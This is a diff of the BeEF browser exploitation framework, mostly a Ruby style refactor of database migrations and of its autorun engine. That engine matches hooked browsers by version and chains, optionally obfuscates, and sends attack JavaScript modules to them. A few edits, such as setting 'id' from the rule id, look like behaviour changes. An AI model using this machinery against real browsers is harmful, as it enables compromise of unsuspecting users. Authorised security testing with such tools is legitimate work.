-            t.references :hooked_browser
-            t.integer :target_hooked_browser_id
-            t.text :signal
-            t.text :has_sent, default: "waiting"
-		end
-
-	end
-
+  def change
+    create_table :rtc_signals do |t|
+      t.references :hooked_browser
+      t.integer :target_hooked_browser_id
+      t.text :signal
+      t.text :has_sent, default: 'waiting'
+    end
+  end
 end
--- a/core/main/ar-migrations/019_create_rtc_module_status.rb
+++ b/core/main/ar-migrations/019_create_rtc_module_status.rb
@@ -1,14 +1,10 @@
 class CreateRtcModuleStatus < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :rtc_module_status do |t|
-            t.references :hooked_browser
-            t.references :command_module
-            t.integer :target_hooked_browser_id
-            t.text :status
-		end
-
-	end
-
+  def change
+    create_table :rtc_module_statuss do |t|
+      t.references :hooked_browser
+      t.references :command_module
+      t.integer :target_hooked_browser_id
+      t.text :status
+    end
+  end
 end
--- a/core/main/ar-migrations/020_create_xssrays_detail.rb
+++ b/core/main/ar-migrations/020_create_xssrays_detail.rb
@@ -1,14 +1,10 @@
 class CreateXssraysDetail < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :xssrays_detail do |t|
-            t.references :hooked_browser
-            t.text :vector_name
-            t.text :vector_method
-            t.text :vector_poc
-		end
-
-	end
-
+  def change
+    create_table :xssraysdetails do |t|
+      t.references :hooked_browser
+      t.text :vector_name
+      t.text :vector_method
+      t.text :vector_poc
+    end
+  end
 end
--- a/core/main/ar-migrations/021_create_dns_rule.rb
+++ b/core/main/ar-migrations/021_create_dns_rule.rb
@@ -1,14 +1,10 @@
 class CreateDnsRule < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :dns_rule do |t|
-          t.text :pattern
-          t.text :resource
-          t.text :response
-          t.text :callback
-		end
-
-	end
-
+  def change
+    create_table :dns_rules do |t|
+      t.text :pattern
+      t.text :resource
+      t.text :response
+      t.text :callback
+    end
+  end
 end
--- a/core/main/ar-migrations/022_create_ipec_exploit.rb
+++ b/core/main/ar-migrations/022_create_ipec_exploit.rb
@@ -1,13 +1,9 @@
 class CreateIpecExploit < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :ipec_exploit do |t|
-            t.text :name
-            t.text :protocol
-            t.text :os
-		end
-
-	end
-
+  def change
+    create_table :ipec_exploits do |t|
+      t.text :name
+      t.text :protocol
+      t.text :os
+    end
+  end
 end
--- a/core/main/ar-migrations/023_create_ipec_exploit_run.rb
+++ b/core/main/ar-migrations/023_create_ipec_exploit_run.rb
@@ -1,13 +1,9 @@
 class CreateIpecExploitRun < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :ipec_exploit_run do |t|
-            t.boolean :launched
-            t.text :http_headers
-            t.text :junk_size
-		end
-
-	end
-
+  def change
+    create_table :ipec_exploit_runs do |t|
+      t.boolean :launched
+      t.text :http_headers
+      t.text :junk_size
+    end
+  end
 end
--- a/core/main/ar-migrations/024_create_autoloader.rb
+++ b/core/main/ar-migrations/024_create_autoloader.rb
@@ -1,12 +1,8 @@
 class CreateAutoloader < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :autoloader do |t|
-            t.references :command
-            t.boolean :in_use
-		end
-
-	end
-
+  def change
+    create_table :autoloaders do |t|
+      t.references :command
+      t.boolean :in_use
+    end
+  end
 end
--- a/core/main/ar-migrations/025_create_xssrays_scan.rb
+++ b/core/main/ar-migrations/025_create_xssrays_scan.rb
@@ -1,18 +1,14 @@
 class CreateXssraysScan < ActiveRecord::Migration[6.0]
-
-	def change
-
-		create_table :xssrays_scan do |t|
-            t.references :hooked_browser
-            t.datetime :scan_start
-            t.datetime :scan_finish
-            t.text :domain
-            t.text :cross_domain
-            t.integer :clean_timeout
-            t.boolean :is_started
-            t.boolean :is_finished
-		end
-
-	end
-
+  def change
+    create_table :xssraysscans do |t|
+      t.references :hooked_browser
+      t.datetime :scan_start
+      t.datetime :scan_finish
+      t.text :domain
+      t.text :cross_domain
+      t.integer :clean_timeout
+      t.boolean :is_started
+      t.boolean :is_finished
+    end
+  end
 end
--- a/core/main/autorun_engine/engine.rb
+++ b/core/main/autorun_engine/engine.rb
@@ -1,14 +1,12 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module AutorunEngine
-
      class Engine
-
        include Singleton

        def initialize
@@ -20,8 +18,8 @@ module BeEF

          @debug_on = @config.get('beef.debug')

-          @VERSION = ['<','<=','==','>=','>','ALL']
-          @VERSION_STR = ['XP','Vista']
+          @VERSION = ['<', '<=', '==', '>=', '>', 'ALL']
+          @VERSION_STR = %w[XP Vista]
        end

        # Check if the hooked browser type/version and OS type/version match any Rule-sets
@@ -30,13 +28,12 @@ module BeEF
        def run(hb_id, browser_name, browser_version, os_name, os_version)
          are = BeEF::Core::AutorunEngine::Engine.instance
          match_rules = are.match(browser_name, browser_version, os_name, os_version)
-          are.trigger(match_rules, hb_id) if match_rules !=nil && match_rules.length > 0
+          are.trigger(match_rules, hb_id) if !match_rules.nil? && match_rules.length > 0
        end

        # Prepare and return the JavaScript of the modules to be sent.
        # It also updates the rules ARE execution table with timings
        def trigger(rule_ids, hb_id)
-
          hb = BeEF::HBManager.get_by_id(hb_id)
          hb_session = hb.session

@@ -48,26 +45,25 @@ module BeEF
            execution_delay = JSON.parse(rule.execution_delay)
            chain_mode  = rule.chain_mode

-            mods_bodies = Array.new
-            mods_codes = Array.new
-            mods_conditions = Array.new
+            mods_bodies = []
+            mods_codes = []
+            mods_conditions = []

            # this ensures that if both rule A and rule B call the same module in sequential mode,
            # execution will be correct preventing wrapper functions to be called with equal names.
            rule_token = SecureRandom.hex(5)

            modules.each do |cmd_mod|
-              mod = BeEF::Core::Models::CommandModule.where(:name => cmd_mod['name']).first
+              mod = BeEF::Core::Models::CommandModule.where(name: cmd_mod['name']).first
              options = []
              replace_input = false
-              cmd_mod['options'].each do|k,v|
-                options.push({'name' => k, 'value' => v})
+              cmd_mod['options'].each do |k, v|
+                options.push({ 'name' => k, 'value' => v })
                replace_input = true if v == '<<mod_input>>'
              end

              command_body = prepare_command(mod, options, hb_id, replace_input, rule_token)

-
              mods_bodies.push(command_body)
              mods_codes.push(cmd_mod['code'])
              mods_conditions.push(cmd_mod['condition'])
@@ -75,32 +71,31 @@ module BeEF

            # Depending on the chosen chain mode (sequential or nested/forward), prepare the appropriate wrapper
            case chain_mode
-              when 'nested-forward'
-                wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order, rule_token)
-              when 'sequential'
-                wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token)
-              else
-                wrapper = nil
-                print_error "Chain mode looks wrong!"
-                # TODO catch error, which should never happen as values are checked way before ;-)
+            when 'nested-forward'
+              wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order, rule_token)
+            when 'sequential'
+              wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token)
+            else
+              wrapper = nil
+              print_error 'Chain mode looks wrong!'
+              # TODO: catch error, which should never happen as values are checked way before ;-)
            end

            are_exec = BeEF::Core::Models::Execution.new(
-                :session => hb_session,
-                :mod_count => modules.length,
-                :mod_successful => 0,
-                :rule_token => rule_token,
-                :mod_body => wrapper,
-                :is_sent => false,
-                :rule_id => rule_id
+              session_id: hb_session,
+              mod_count: modules.length,
+              mod_successful: 0,
+              rule_token: rule_token,
+              mod_body: wrapper,
+              is_sent: false,
+              id: rule_id
            )
            are_exec.save!
            # Once Engine.check() verified that the hooked browser match a Rule, trigger the Rule ;-)
-            print_more "Triggering ruleset #{rule_ids.to_s} on HB #{hb_id}"
+            print_more "Triggering ruleset #{rule_ids} on HB #{hb_id}"
          end
        end

-
        # Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay.
        # Launch order is also taken care of.
        #  - sequential chain with delays (setTimeout stuff)
@@ -114,7 +109,7 @@ module BeEF
          delayed_exec = ''
          c = 0
          while c < mods.length
-            delayed_exec += %Q| setTimeout(function(){#{mods[order[c]][:mod_name]}_#{rule_token}();}, #{delay[c]}); |
+            delayed_exec += %| setTimeout(function(){#{mods[order[c]][:mod_name]}_#{rule_token}();}, #{delay[c]}); |
            mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output")
            wrapped_mod = "#{mod_body}\n"
            wrapper += wrapped_mod
@@ -141,16 +136,17 @@ module BeEF
        #     if the first once return with success. Also, the second module has the possibility of mangling first
        #     module output and use it as input for some of its module inputs.
        def prepare_nested_forward_wrapper(mods, code, conditions, order, rule_token)
-          wrapper, delayed_exec = '',''
-          delayed_exec_footers = Array.new
+          wrapper = ''
+          delayed_exec = ''
+          delayed_exec_footers = []
          c = 0

          while c < mods.length
-            if mods.length == 1
-              i = c
-            else
-              i = c + 1
-            end
+            i = if mods.length == 1
+                  c
+                else
+                  c + 1
+                end

            code_snippet = ''
            mod_input = ''
@@ -159,11 +155,11 @@ module BeEF
              mod_input = 'mod_input'
            end

-            conditions[i] = true if conditions[i] == nil || conditions[i] == ''
+            conditions[i] = true if conditions[i].nil? || conditions[i] == ''

            if c == 0
              # this is the first wrapper to prepare
-              delayed_exec += %Q|
+              delayed_exec += %|
                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
                  #{mods[order[c]][:mod_name]}_#{rule_token}();

@@ -185,7 +181,7 @@ module BeEF
                         #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
              |

-              delayed_exec_footer = %Q|
+              delayed_exec_footer = %|
                     }
                    }
                  }
@@ -198,10 +194,10 @@ module BeEF
              delayed_exec_footers.push(delayed_exec_footer)

            elsif c < mods.length - 1
-              code_snippet = code_snippet.to_s.gsub(mods[order[c-1]][:mod_name], "#{mods[order[c-1]][:mod_name]}_#{rule_token}")
+              code_snippet = code_snippet.to_s.gsub(mods[order[c - 1]][:mod_name], "#{mods[order[c - 1]][:mod_name]}_#{rule_token}")

              # this is one of the wrappers in the middle of the chain
-              delayed_exec += %Q|
+              delayed_exec += %|
                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
                  if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
                     #{code_snippet}
@@ -223,7 +219,7 @@ module BeEF
                             #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
              |

-              delayed_exec_footer = %Q|
+              delayed_exec_footer = %|
                         }
                       }
                     }
@@ -236,9 +232,9 @@ module BeEF

              delayed_exec_footers.push(delayed_exec_footer)
            else
-              code_snippet = code_snippet.to_s.gsub(mods[order[c-1]][:mod_name], "#{mods[order[c-1]][:mod_name]}_#{rule_token}")
+              code_snippet = code_snippet.to_s.gsub(mods[order[c - 1]][:mod_name], "#{mods[order[c - 1]][:mod_name]}_#{rule_token}")
              # this is the last wrapper to prepare
-              delayed_exec += %Q|
+              delayed_exec += %|
                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
                  if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
                     #{code_snippet}
@@ -258,7 +254,6 @@ module BeEF
          wrapper
        end

-
        # prepare the command module (compiling the Erubis templating stuff), eventually obfuscate it,
        # and store it in the database.
        # Returns the raw module body after template substitution.
@@ -266,16 +261,16 @@ module BeEF
          config = BeEF::Core::Configuration.instance
          begin
            command = BeEF::Core::Models::Command.new(
-                :data => options.to_json,
-                :hooked_browser_id => hb_id,
-                :command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod.name}.db.id"),
-                :creationdate => Time.new.to_i,
-                :instructions_sent => true
+              data: options.to_json,
+              hooked_browser_id: hb_id,
+              command_module_id: BeEF::Core::Configuration.instance.get("beef.module.#{mod.name}.db.id"),
+              creationdate: Time.new.to_i,
+              instructions_sent: true
            )
            command.save!

            command_module = BeEF::Core::Models::CommandModule.find(mod.id)
-            if (command_module.path.match(/^Dynamic/))
+            if command_module.path.match(/^Dynamic/)
              # metasploit and similar integrations
              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
            else
@@ -293,18 +288,18 @@ module BeEF

            build_missing_beefjs_components(command_module.beefjs_components) unless command_module.beefjs_components.empty?

-            if config.get("beef.extension.evasion.enable")
+            if config.get('beef.extension.evasion.enable')
              evasion = BeEF::Extension::Evasion::Evasion.instance
              command_body = evasion.obfuscate(command_module.output) + "\n\n"
            else
-              command_body = command_module.output  + "\n\n"
+              command_body = command_module.output + "\n\n"
            end

            # @note prints the event to the console
            print_more "Preparing JS for command id [#{command.id}], module [#{mod.name}]"

-            replace_input ? mod_input = 'mod_input' : mod_input = ''
-            result = %Q|
+            mod_input = replace_input ? 'mod_input' : ''
+            result = %|
                var #{mod.name}_#{rule_token} = function(#{mod_input}){
                    #{clean_command_body(command_body, replace_input)}
                };
@@ -312,8 +307,8 @@ module BeEF
                var #{mod.name}_#{rule_token}_mod_output = null;
            |

-            return {:mod_name => mod.name, :mod_body => result}
-          rescue =>  e
+            { mod_name: mod.name, mod_body: result }
+          rescue StandardError => e
            print_error e.message
            print_debug e.backtrace.join("\n")
          end
@@ -324,56 +319,47 @@ module BeEF
        #
        # Also replace <<mod_input>> with mod_input variable if needed for chaining module output/input
        def clean_command_body(command_body, replace_input)
-          begin
-            cmd_body = command_body.lines.map(&:chomp)
-            wrapper_start_index,wrapper_end_index = nil
+          cmd_body = command_body.lines.map(&:chomp)
+          wrapper_start_index, wrapper_end_index = nil

-            cmd_body.each_with_index do |line, index|
-              if line.to_s =~ /^(beef|[a-zA-Z]+)\.execute\(function\(\)/
-                wrapper_start_index = index
-                break
-              end
-            end
-            if wrapper_start_index.nil?
-              print_error "[ARE] Could not find module start index"
+          cmd_body.each_with_index do |line, index|
+            if line.to_s =~ /^(beef|[a-zA-Z]+)\.execute\(function\(\)/
+              wrapper_start_index = index
+              break
            end
+          end
+          print_error '[ARE] Could not find module start index' if wrapper_start_index.nil?

-            cmd_body.reverse.each_with_index do |line, index|
-              if line.include?('});')
-                wrapper_end_index = index
-                break
-              end
-            end
-            if wrapper_end_index.nil?
-              print_error "[ARE] Could not find module end index"
+          cmd_body.reverse.each_with_index do |line, index|
+            if line.include?('});')
+              wrapper_end_index = index
+              break
            end
+          end
+          print_error '[ARE] Could not find module end index' if wrapper_end_index.nil?

-            cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index+1)).join("\n")
-            if cleaned_cmd_body.eql?('')
-              print_error "[ARE] No command to send"
-            end
+          cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index + 1)).join("\n")
+          print_error '[ARE] No command to send' if cleaned_cmd_body.eql?('')

-            # check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
-            if replace_input
-              if cleaned_cmd_body.include?('"<<mod_input>>"')
-                final_cmd_body = cleaned_cmd_body.gsub('"<<mod_input>>"','mod_input')
-              elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
-                final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
-              elsif cleaned_cmd_body.include?('<<mod_input>>')
-                final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
-              else
-                return cleaned_cmd_body
-              end
-              return final_cmd_body
+          # check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
+          if replace_input
+            if cleaned_cmd_body.include?('"<<mod_input>>"')
+              final_cmd_body = cleaned_cmd_body.gsub('"<<mod_input>>"', 'mod_input')
+            elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
+              final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
+            elsif cleaned_cmd_body.include?('<<mod_input>>')
+              final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
            else
              return cleaned_cmd_body
            end
-          rescue =>  e
-            print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body"
+            final_cmd_body
+          else
+            cleaned_cmd_body
          end
+        rescue StandardError => e
+          print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body. #{e.message}"
        end

-
        # Checks if there are any ARE rules to be triggered for the specified hooked browser
        #
        # Note: browser version checks are supporting only major versions, ex: C 43, IE 11
@@ -382,105 +368,119 @@ module BeEF
        # Returns an array with rule IDs that matched and should be triggered.
        # if rule_id is specified, checks will be executed only against the specified rule (useful
        #  for dynamic triggering of new rulesets ar runtime)
-        def match(browser, browser_version, os, os_version, rule_id=nil)
+        def match(browser, browser_version, os, os_version, rule_id = nil)
          match_rules = []
-          if rule_id != nil
-            rules = [BeEF::Core::Models::Rule.find(rule_id)]
-          else
-            rules = BeEF::Core::Models::Rule.all
-          end
-          return nil if rules == nil
+          rules = if rule_id.nil?
+                    BeEF::Core::Models::Rule.all
+                  else
+                    [BeEF::Core::Models::Rule.find(rule_id)]
+                  end
+          return nil if rules.nil?
          return nil unless rules.length > 0

-          print_info "[ARE] Checking if any defined rules should be triggered on target."
-          # TODO handle cases where there are multiple ARE rules for the same hooked browser.
+          print_info '[ARE] Checking if any defined rules should be triggered on target.'
+          # TODO: handle cases where there are multiple ARE rules for the same hooked browser.
          # TODO the above works well, but maybe rules need to have priority or something?
          rules.each do |rule|
-            begin
-              browser_match, os_match = false, false
+            browser_match = false
+            os_match = false

-              b_ver_cond = rule.browser_version.split(' ').first
-              b_ver = rule.browser_version.split(' ').last
+            b_ver_cond = rule.browser_version.split(' ').first
+            b_ver = rule.browser_version.split(' ').last

-              os_ver_rule_cond = rule.os_version.split(' ').first
-              os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
-              os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
+            os_ver_rule_cond = rule.os_version.split(' ').first
+            os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
+            os_ver_rule_min = rule.os_version.split(' ').last.split('.').last

-              # Most of the times Linux/*BSD OS doesn't return any version
-              # (TODO: improve OS detection on these operating systems)
-              if os_version != nil && !@VERSION_STR.include?(os_version)
-                os_ver_hook_maj = os_version.split('.').first
-                os_ver_hook_min = os_version.split('.').last
+            # Most of the times Linux/*BSD OS doesn't return any version
+            # (TODO: improve OS detection on these operating systems)
+            if !os_version.nil? && !@VERSION_STR.include?(os_version)
+              os_ver_hook_maj = os_version.split('.').first
+              os_ver_hook_min = os_version.split('.').last

-                # the following assignments to 0 are need for later checks like:
-                # 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
-                os_ver_hook_min = 0 if os_version.split('.').length == 1
-                os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
-              else
-                # most probably Windows XP or Vista. the following is a hack as Microsoft had the brilliant idea
-                # to switch from strings to numbers in OS versioning. To prevent rewriting code later on,
-                # we say that XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
-                  os_ver_hook_maj, os_ver_hook_min = 5, 0 if os_version == 'XP'
-                  os_ver_hook_maj, os_ver_hook_min = 6, 0 if os_version == 'Vista'
+              # the following assignments to 0 are need for later checks like:
+              # 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
+              os_ver_hook_min = 0 if os_version.split('.').length == 1
+              os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
+            else
+              # most probably Windows XP or Vista. the following is a hack as Microsoft had the brilliant idea
+              # to switch from strings to numbers in OS versioning. To prevent rewriting code later on,
+              # we say that XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
+              if os_version == 'XP'
+                os_ver_hook_maj = 5
+                os_ver_hook_min = 0
              end
-
-              os_ver_rule_maj, os_ver_rule_min = 5, 0 if os_ver_rule_maj == 'XP'
-              os_ver_rule_maj, os_ver_rule_min = 6, 0 if os_ver_rule_maj == 'Vista'
-
-              next unless @VERSION.include?(b_ver_cond)
-              next unless BeEF::Filters::is_valid_browserversion?(b_ver)
-
-              next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
-              # os_ver without checks as it can be very different or even empty, for instance on linux/bsd)
-
-              # skip rule unless the browser matches
-              browser_match = false
-              # check if rule specifies multiple browsers
-              if rule.browser !~ /\A[A-Z]+\Z/
-                rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
-                  browser_match = true if b == browser || b == 'ALL'
-                end
-              # else, only one browser
-              else
-                next unless rule.browser == 'ALL' || browser == rule.browser
-                # check if the browser version matches
-                browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
-                if browser_version_match
-                  browser_match = true
-                else
-                  browser_match = false
-                end
-                print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
+              if os_version == 'Vista'
+                os_ver_hook_maj = 6
+                os_ver_hook_min = 0
              end
-              next unless browser_match
-
-              # skip rule unless the OS matches
-              next unless rule.os == 'ALL' || os == rule.os
-
-              # check if the OS versions match
-              if os_version != nil || rule.os_version != 'ALL'
-                os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
-                os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
-              else
-                # os_version_match = true if (browser doesn't return an OS version || rule OS version is ALL )
-                os_major_version_match, os_minor_version_match = true, true
-              end
-
-              os_match = true if os_ver_rule_cond == 'ALL' || (os_major_version_match && os_minor_version_match)
-              print_more "OS version check -> (hook) #{os_version} #{rule.os_version} (rule): #{os_major_version_match && os_minor_version_match}"
-
-              if browser_match && os_match
-                print_more "Hooked browser and OS type/version MATCH rule: #{rule.name}."
-                match_rules.push(rule.id)
-              end
-            rescue =>  e
-              print_error e.message
-              print_debug e.backtrace.join("\n")
            end
+
+            if os_ver_rule_maj == 'XP'
+              os_ver_rule_maj = 5
+              os_ver_rule_min = 0
+            end
+            if os_ver_rule_maj == 'Vista'
+              os_ver_rule_maj = 6
+              os_ver_rule_min = 0
+            end
+
+            next unless @VERSION.include?(b_ver_cond)
+            next unless BeEF::Filters.is_valid_browserversion?(b_ver)
+
+            next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
+
+            # os_ver without checks as it can be very different or even empty, for instance on linux/bsd)
+
+            # skip rule unless the browser matches
+            browser_match = false
+            # check if rule specifies multiple browsers
+            if rule.browser =~ /\A[A-Z]+\Z/
+              next unless rule.browser == 'ALL' || browser == rule.browser
+
+              # check if the browser version matches
+              browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
+              browser_match = if browser_version_match
+                                true
+                              else
+                                false
+                              end
+              print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
+            else
+              rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
+                browser_match = true if b == browser || b == 'ALL'
+              end
+              # else, only one browser
+            end
+            next unless browser_match
+
+            # skip rule unless the OS matches
+            next unless rule.os == 'ALL' || os == rule.os
+
+            # check if the OS versions match
+            if !os_version.nil? || rule.os_version != 'ALL'
+              os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
+              os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
+            else
+              # os_version_match = true if (browser doesn't return an OS version || rule OS version is ALL )
+              os_major_version_match = true
+              os_minor_version_match = true
+            end
+
+            os_match = true if os_ver_rule_cond == 'ALL' || (os_major_version_match && os_minor_version_match)
+            print_more "OS version check -> (hook) #{os_version} #{rule.os_version} (rule): #{os_major_version_match && os_minor_version_match}"
+
+            if browser_match && os_match
+              print_more "Hooked browser and OS type/version MATCH rule: #{rule.name}."
+              match_rules.push(rule.id)
+            end
+          rescue StandardError => e
+            print_error e.message
+            print_debug e.backtrace.join("\n")
          end
          print_more "Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser type/version."

-          return match_rules
+          match_rules
        end

        # compare versions
@@ -491,7 +491,8 @@ module BeEF
          return true if cond == '<'  && ver_a <  ver_b
          return true if cond == '>=' && ver_a >= ver_b
          return true if cond == '>'  && ver_a >  ver_b
-          return false
+
+          false
        end
      end
    end
--- a/core/main/autorun_engine/parser.rb
+++ b/core/main/autorun_engine/parser.rb
@@ -1,89 +1,85 @@
 #
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module AutorunEngine
-
      class Parser
-
        include Singleton

        def initialize
          @config = BeEF::Core::Configuration.instance
        end

-        BROWSER = ['FF','C','IE','S','O','ALL']
-        OS = ['Linux','Windows','OSX','Android','iOS','BlackBerry','ALL']
-        VERSION = ['<','<=','==','>=','>','ALL','Vista','XP']
-        CHAIN_MODE = ['sequential','nested-forward']
+        BROWSER = %w[FF C IE S O ALL]
+        OS = %w[Linux Windows OSX Android iOS BlackBerry ALL]
+        VERSION = ['<', '<=', '==', '>=', '>', 'ALL', 'Vista', 'XP']
+        CHAIN_MODE = %w[sequential nested-forward]
        MAX_VER_LEN = 15
        # Parse a JSON ARE file and returns an Hash with the value mappings
-        def parse(name,author,browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode)
-          begin
-            success = [true]
+        def parse(name, author, browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode)
+          success = [true]

-            return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
-            return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
-            return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
-            # if multiple browsers were specified, check each browser
-            if browser.kind_of?(Array)
-              browser.each do |b|
-                return [false, 'Illegal browser definition'] unless BROWSER.include?(b)
-              end
-            # else, if only one browser was specified, check browser and browser version
-            else
-              return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
-              if browser_version != 'ALL'
-                return [false, 'Illegal browser_version definition'] unless
-                  VERSION.include?(browser_version[0,2].gsub(/\s+/,'')) &&
-                      BeEF::Filters::is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/,'')) && browser_version.length < MAX_VER_LEN
-              end
+          return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
+          return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
+          return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
+
+          # if multiple browsers were specified, check each browser
+          if browser.is_a?(Array)
+            browser.each do |b|
+              return [false, 'Illegal browser definition'] unless BROWSER.include?(b)
            end
+          # else, if only one browser was specified, check browser and browser version
+          else
+            return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)

-            if os_version != 'ALL'
-              return [false, 'Illegal os_version definition'] unless
-                  VERSION.include?(os_version[0,2].gsub(/\s+/,'')) &&
-                      BeEF::Filters::is_valid_osversion?(os_version[2..-1].gsub(/\s+/,'')) && os_version.length < MAX_VER_LEN
+            if browser_version != 'ALL' && !(VERSION.include?(browser_version[0, 2].gsub(/\s+/, '')) &&
+                  BeEF::Filters.is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/, '')) && browser_version.length < MAX_VER_LEN)
+              return [false, 'Illegal browser_version definition']
            end
-
-            return [false, 'Illegal os definition'] unless OS.include?(os)
-
-            # check if module names, conditions and options are ok
-            modules.each do |cmd_mod|
-              mod = BeEF::Core::Models::CommandModule.where(:name => cmd_mod['name']).first
-              if mod != nil
-                modk = BeEF::Module.get_key_by_database_id(mod.id)
-                mod_options = BeEF::Module.get_options(modk)
-
-                opt_count = 0
-                mod_options.each do |opt|
-                   if opt['name'] == cmd_mod['options'].keys[opt_count]
-                     opt_count += 1
-                   else
-                     return [false, "The specified option (#{cmd_mod['options'].keys[opt_count]
-                                             }) for module (#{cmd_mod['name']}) does not exist"]
-                   end
-                end
-              else
-                return [false, "The specified module name (#{cmd_mod['name']}) does not exist"]
-              end
-            end
-
-            exec_order.each{ |order| return [false, 'execution_order values must be Integers'] unless order.integer?}
-            exec_delay.each{ |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer?}
-
-            return [false, 'execution_order and execution_delay values must be consistent with modules numbers'] unless
-                modules.size == exec_order.size && modules.size == exec_delay.size
-
-            success
-          rescue => e
-            print_error "#{e.message}"
-            print_debug "#{e.backtrace.join("\n")}"
-            return [false, 'Something went wrong.']
          end
+
+          if os_version != 'ALL' && !(VERSION.include?(os_version[0, 2].gsub(/\s+/, '')) &&
+                  BeEF::Filters.is_valid_osversion?(os_version[2..-1].gsub(/\s+/, '')) && os_version.length < MAX_VER_LEN)
+            return [false, 'Illegal os_version definition']
+          end
+
+          return [false, 'Illegal os definition'] unless OS.include?(os)
+
+          # check if module names, conditions and options are ok
+          modules.each do |cmd_mod|
+            mod = BeEF::Core::Models::CommandModule.where(name: cmd_mod['name']).first
+            if mod.nil?
+              return [false, "The specified module name (#{cmd_mod['name']}) does not exist"]
+            else
+              modk = BeEF::Module.get_key_by_database_id(mod.id)
+              mod_options = BeEF::Module.get_options(modk)
+
+              opt_count = 0
+              mod_options.each do |opt|
+                if opt['name'] == cmd_mod['options'].keys[opt_count]
+                  opt_count += 1
+                else
+                  return [false, "The specified option (#{cmd_mod['options'].keys[opt_count]
+                                                        }) for module (#{cmd_mod['name']}) does not exist"]
+                end
+              end
+            end
+          end
+
+          exec_order.each { |order| return [false, 'execution_order values must be Integers'] unless order.integer? }
